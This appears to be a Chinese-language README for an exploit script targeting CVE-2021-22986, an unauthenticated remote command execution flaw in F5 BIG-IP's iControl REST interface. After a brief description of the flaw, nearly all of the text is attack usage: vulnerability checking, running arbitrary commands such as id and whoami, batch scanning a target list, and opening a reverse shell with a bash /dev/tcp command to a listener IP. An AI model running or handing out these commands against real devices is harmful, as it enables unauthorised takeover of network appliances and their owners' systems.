此漏洞允许未经身份验证的攻击者通过网络访问 iControl REST 接口(通过 BIG-IP 管理接口和自 IP 地址),执行任意系统命令、创建或删除文件以及禁用服务。此漏洞仅能通过控制平面利用,无法通过数据平面利用。利用可能导致系统完全沦陷。处于设备模式的 BIG-IP 系统同样受此漏洞影响。
基本用法
python3 CVE_2021_22986.py

漏洞检查
python3 CVE_2021_22986.py -v true -u https://192.168.174.164

命令执行:
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c id

python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c whoami

批量扫描
python3 CVE_2021_22986.py -s true -f check.txt

反弹Shell
python3 CVE_2021_22986.py -r true -u https://192.168.174.164 -c "bash -i >&/dev/tcp/192.168.174.129/8888 0>&1"


python3 newpoc.py https://192.168.174.164

https://support.f5.com/csp/article/K03009991